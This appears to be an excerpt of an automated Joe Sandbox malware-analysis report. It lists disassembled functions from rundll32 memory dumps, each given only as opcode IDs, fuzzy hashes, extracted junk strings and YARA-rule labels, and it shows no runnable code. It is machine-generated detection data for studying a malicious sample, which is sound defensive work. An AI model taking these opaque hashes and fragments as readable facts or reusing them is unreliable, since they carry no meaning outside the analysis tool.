                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91210875A10218AFCB54DF69D88599EBBB6FF4C710B10812AE905AB360DB319941CBA0
                                                                                                                                                                                                                                          Function 06F41378 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: eeb129fe1d98e195827b76963cd92624788fa80e8f5232209721c51811dbd664
                                                                                                                                                                                                                                          • Instruction ID: e6c4e00aae104493f6fe8c9f3ba4778bbc8b09088e47202c6f366267bfad3a31
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eeb129fe1d98e195827b76963cd92624788fa80e8f5232209721c51811dbd664
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D52113B0D042498ECB14DFAAC885AEEFFF0FF88324F10852AD419A7240C7746945CFA5
                                                                                                                                                                                                                                          Function 06F41380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 62a23ff6afad00901c168114ee2091cffec1fdf43ed0abac6d6db2abcfced96d
                                                                                                                                                                                                                                          • Instruction ID: 039789cd5c3a4aaa7c69d3aa48abab03086c01019533a206cd62be9543109872
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62a23ff6afad00901c168114ee2091cffec1fdf43ed0abac6d6db2abcfced96d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 521103B0D002098FDB14DFAAC885AEEFBF4FF88324F10842AD51967240CB746945CFA5
                                                                                                                                                                                                                                          Function 06F41829 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3377fb125e5de86045cb8056739470d7d5ada4ec7e42d7dd3bc78c6c33134e23
                                                                                                                                                                                                                                          • Instruction ID: 37378bd29b3fc00d13411f046bbbf9131ef26177514e32103d41506775f9e71e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3377fb125e5de86045cb8056739470d7d5ada4ec7e42d7dd3bc78c6c33134e23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1801A271F14214A7E768FBAA8894BBF7EEB9BC8710F114429E605A7780CEB54D40C7E1
                                                                                                                                                                                                                                          Function 06F41968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: af69de3a6506a72478316fa2e2a563a6012596a7e28d17cfa2a6cfa8cd9e66f6
                                                                                                                                                                                                                                          • Instruction ID: 3df9156b60dfe4bcd92dc7d35ae365647a7ac2d0e0aebf71f162678aae278ea0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af69de3a6506a72478316fa2e2a563a6012596a7e28d17cfa2a6cfa8cd9e66f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9111F35600205DFDB04DFA5E459AAD7FB7EF9C315F154019E60AA7380CF759885CB90
                                                                                                                                                                                                                                          Function 0485D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1837031634.000000000485D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_485d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7a96c30e574c4c2381f70f06408b14c1e15cfec7416c1ec9845fbb8011a2364e
                                                                                                                                                                                                                                          • Instruction ID: bb3610d0e94dc5975700363f52d69b015227b92ee67c757f7b044b0cc41c957f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a96c30e574c4c2381f70f06408b14c1e15cfec7416c1ec9845fbb8011a2364e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D012B711093449AE710AF25ECC4B67BFD8DF51325F08CA1AEC0C8B292C378A841C7B1
                                                                                                                                                                                                                                          Function 06F41440 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e31137be6ca0d7a9144b6276aefa3240a21acafb3531de1a5d9630881729195a
                                                                                                                                                                                                                                          • Instruction ID: 690a2e5d60be4c757e570128e6165702a8f269feee3ac064b0f982d2e6f0a87d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e31137be6ca0d7a9144b6276aefa3240a21acafb3531de1a5d9630881729195a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7001F930A0A3455FC7099F75B9315373FEAEED228931609AFD645CF2B2EA258908C3D1
                                                                                                                                                                                                                                          Function 0485D005 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1837031634.000000000485D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_485d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f05088d8ab0cd88f7c5b3cde496574a963d86adb389462b84fbbbd606e7ba28c
                                                                                                                                                                                                                                          • Instruction ID: 540fdee8300335e752df733099801c6ee9bd123b007137ff0dfe7f36c00a5bfb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f05088d8ab0cd88f7c5b3cde496574a963d86adb389462b84fbbbd606e7ba28c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53019E7100E3C09EE7128B259C94B52BFA4DF53224F08C1CBDD888F2A3C2695849C772
                                                                                                                                                                                                                                          Function 06F41431 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 05082085208840fa4be9eddc172c1a3434ee825f440428a5bda5a6f0bc14b29a
                                                                                                                                                                                                                                          • Instruction ID: 6131fcf8d46c46552fca74dcd4ada3d41f30b1d7c7040983d6018622b71c2794
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05082085208840fa4be9eddc172c1a3434ee825f440428a5bda5a6f0bc14b29a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF0F670A053065FC708AFB6B92252B3FDAFFD2299311096ED609CF2A1FA618544C7D0
                                                                                                                                                                                                                                          Function 06F425D1 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 267d998408c2af8bb3eaf3db39c47b08ca9091fdc899c05e63930ef1a0208805
                                                                                                                                                                                                                                          • Instruction ID: fe3596c1409dbc5a7e7dd3d628d59c8ce70390fb7a894f14dd3430d3b51469b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 267d998408c2af8bb3eaf3db39c47b08ca9091fdc899c05e63930ef1a0208805
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F0BE3AA141945BDB089628E8196FEBB769BC8221F24817EE406A3780EE711D19C7A1
                                                                                                                                                                                                                                          Function 06F42654 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c1f07db1bf3a881cd1ff6d2063b79f822b444cb0fe98a80f151f8e2ef7312d26
                                                                                                                                                                                                                                          • Instruction ID: 8b34350bb3928a67bde15b1f82bbe566549a0b806be34572306b0e0202e05ee5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1f07db1bf3a881cd1ff6d2063b79f822b444cb0fe98a80f151f8e2ef7312d26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CE01A20F3471907EBF839695D107A67ECE9B96754F000C7AF94187F82E9D4EA4503E2
                                                                                                                                                                                                                                          Function 06F425E0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2328acd77623b7eaa725e3ba116fb9eecdc1283790dae0e8371c1623f62c6ce9
                                                                                                                                                                                                                                          • Instruction ID: a27be7c31c81d61d52671a68abfb40cad26f6a5168a7b2d936206cf3af51187b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2328acd77623b7eaa725e3ba116fb9eecdc1283790dae0e8371c1623f62c6ce9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66E0E536F101189BCB089668E4585FDB7BA9BC8211B108036D906A3740EF701D09CB91
                                                                                                                                                                                                                                          Function 06F417F0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d77316730daf1ca4b8257de68462e25fe79111837874f15e6d5a22c5df365edd
                                                                                                                                                                                                                                          • Instruction ID: 45a01952a18cf30e10b32097c61ba58c192611575aedbed7960c7092f933bd60
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d77316730daf1ca4b8257de68462e25fe79111837874f15e6d5a22c5df365edd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DE0C232218254AFC3061B24AC164E67FBDAB0A2203084067F9808B261CE610E11C7E0
                                                                                                                                                                                                                                          Function 06F42590 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1ca50bedd747f35f436f7fb5800054ff4633a649ca0411979fa9ac73ad0071ef
                                                                                                                                                                                                                                          • Instruction ID: 8135e2a9802f54511d58c0712b2fc7944b33637f6dd8cbb82ad0075f81b8f906
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ca50bedd747f35f436f7fb5800054ff4633a649ca0411979fa9ac73ad0071ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDE02B3010A3208FC3026B78AC119CA3FA1DF416013078EA7F645CF226DE602EC983E1
                                                                                                                                                                                                                                          Function 06F42A58 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9a1772d5cb4ac2030b03ec22e0e213920a5c06b7a3d7eca077bf1e126c6846b1
                                                                                                                                                                                                                                          • Instruction ID: f5b3da2fcfc41356a41c9d48229dea664cfeefc5e4401206486a3a71c010ce6d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a1772d5cb4ac2030b03ec22e0e213920a5c06b7a3d7eca077bf1e126c6846b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BE0EC74D002099F8790EFB9890156ABBF4AF49204B5085B99808D7600FA3296428B91
                                                                                                                                                                                                                                          Function 06F40C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8574907d2e41e22ff82edbb44faf4f4d7ec32ca933dcf121a245e847fbe204bb
                                                                                                                                                                                                                                          • Instruction ID: 1072f738f80f3925c31c67daaa9f0c42a4b492c30b794a88b502612a1309da6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8574907d2e41e22ff82edbb44faf4f4d7ec32ca933dcf121a245e847fbe204bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDD0A7332341185B43447718EC4B97A7F99E7983613114423FA0687750CD615C5187D5
                                                                                                                                                                                                                                          Function 06F40440 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2179bd21bfe469151aa1696a229763e6f3bf89b14a1f7f639bec107d82fd6720
                                                                                                                                                                                                                                          • Instruction ID: b6595e8c748e082634357d0dfd17d4008e559d81b75207667e29a6efdb74ef9a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2179bd21bfe469151aa1696a229763e6f3bf89b14a1f7f639bec107d82fd6720
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FC08C3419F3D02FCB1383A0EC89C87BF369A6630030903D6F08289022C22A0EA4C3F2

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 074F71D0 Relevance: 9.8, Strings: 7, Instructions: 1070COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888917227.00000000074F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074F0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_74f0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Pldq$Pldq$Pldq$Pldq$Pldq$x iq$|k=p
                                                                                                                                                                                                                                          • API String ID: 0-1001659267
                                                                                                                                                                                                                                          • Opcode ID: 8080d580307f8147e9a25778c1f9bf485f148bfe00fa895f7487c9fd49dfbd2e
                                                                                                                                                                                                                                          • Instruction ID: a57fe2d5c75ffaf2b22b4ee780ed5797a142fb5ddb8b7ff362ed0e7a9dd38086
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8080d580307f8147e9a25778c1f9bf485f148bfe00fa895f7487c9fd49dfbd2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8926FB47002158FDB15DF69C584AAEBBF2FF88301F65886AD5469B361DB34EC42CB90
                                                                                                                                                                                                                                          Function 074F0040 Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888917227.00000000074F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074F0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_74f0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \;dq
                                                                                                                                                                                                                                          • API String ID: 0-2922547838
                                                                                                                                                                                                                                          • Opcode ID: bb97e9dfe5ec4929c71b180f0f75d66a887d9009535961a7d9219765c54c01b1
                                                                                                                                                                                                                                          • Instruction ID: 73ae27125f715a10e8e4aa41f0d44fde64950f78f569ebb935c8678d33b77004
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb97e9dfe5ec4929c71b180f0f75d66a887d9009535961a7d9219765c54c01b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED226B70E1061ACFCB14DF78C9446DDB7B2BF99300F1186AAE905AB361EB74A985CF50
                                                                                                                                                                                                                                          Function 0504746A Relevance: 20.9, Strings: 16, Instructions: 924COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: fq$$&eq$(_dq$4'dq$4'dq$4'dq$4'dq$4cdq$4cdq$@bdq$|-eq$$dq$$dq$cdq$cdq$fq
                                                                                                                                                                                                                                          • API String ID: 0-2310223980
                                                                                                                                                                                                                                          • Opcode ID: 4499fcf0588626371dd0eabb6adc825040e7e92d4dcbc00a32b79c8d65347a99
                                                                                                                                                                                                                                          • Instruction ID: bb819ce327e0610c9ecb4995258013c9d948c421534b373fcf7fe874e46be47c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4499fcf0588626371dd0eabb6adc825040e7e92d4dcbc00a32b79c8d65347a99
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98A2E6B09002289FDB25DF60D951AEEBBB6FF89301F1044EAD5096B291DF359E85CF81
                                                                                                                                                                                                                                          Function 050474C0 Relevance: 20.9, Strings: 16, Instructions: 867COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: fq$$&eq$(_dq$4'dq$4'dq$4'dq$4'dq$4cdq$4cdq$@bdq$|-eq$$dq$$dq$cdq$cdq$fq
                                                                                                                                                                                                                                          • API String ID: 0-2310223980
                                                                                                                                                                                                                                          • Opcode ID: acb0c296cd2a101f4c802deedebef48e5d3fe74d5190ce12476c06cbf1ed42ef
                                                                                                                                                                                                                                          • Instruction ID: 5d120852e63182272e637f02596d6aa678a932d7dc9d49f4ec6e81bc562c40ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acb0c296cd2a101f4c802deedebef48e5d3fe74d5190ce12476c06cbf1ed42ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E192B1B0A00228DFDB259F60D955AEEBBB6FF89301F1045E9D5096B290DF359E81CF81
                                                                                                                                                                                                                                          Function 0504B688 Relevance: 6.5, Strings: 5, Instructions: 224COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq$\;dq$l;Dp$?Dp$|cq
                                                                                                                                                                                                                                          • API String ID: 0-773623717
                                                                                                                                                                                                                                          • Opcode ID: 7aad79278ffd9d5b839e3b4146b08450e35f5c86f2ea1d0c83e0a3d1608ce15f
                                                                                                                                                                                                                                          • Instruction ID: ff05d0f4ff2d613b7a024e6f05e40ff492fb2162547c68bd11657825a30e7bc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aad79278ffd9d5b839e3b4146b08450e35f5c86f2ea1d0c83e0a3d1608ce15f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D61B4F8B042164BDB54DA6A9850A7FBBEBBFD4340B14803AD805D7794DE34DC02CBA5
                                                                                                                                                                                                                                          Function 0504BAD8 Relevance: 3.9, Strings: 3, Instructions: 193COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq$(hq$(hq
                                                                                                                                                                                                                                          • API String ID: 0-981609802
                                                                                                                                                                                                                                          • Opcode ID: 1bef0aff19edf9f08987eb16573bf1037439c80e55e21b2c23987c7e1046b0a7
                                                                                                                                                                                                                                          • Instruction ID: 10963ba85124ef32767fe2c850e4465a5f561392164492fcdea2c9b208be704c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bef0aff19edf9f08987eb16573bf1037439c80e55e21b2c23987c7e1046b0a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6651BD75B041148FDB14DF79E894A6E7BE6FF8425071480BAE90ADB3A1EE34ED018B91
                                                                                                                                                                                                                                          Function 050485C0 Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq$d
                                                                                                                                                                                                                                          • API String ID: 0-2835645469
                                                                                                                                                                                                                                          • Opcode ID: e8f0f5fdce2ee37e0bbe60b3191d0ed81d6369a6011f9fab1aac0b33252b0178
                                                                                                                                                                                                                                          • Instruction ID: 1bb7b6d9db94bdead8520a744feff7154f6ea1bca29283fef7d9ea02ba247397
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8f0f5fdce2ee37e0bbe60b3191d0ed81d6369a6011f9fab1aac0b33252b0178
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C60277B4A006058FD710CF29D48496ABBF2FF89314B25CA69D45A9B765DB30FC46CF90
                                                                                                                                                                                                                                          Function 05046C20 Relevance: 2.8, Strings: 2, Instructions: 337COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
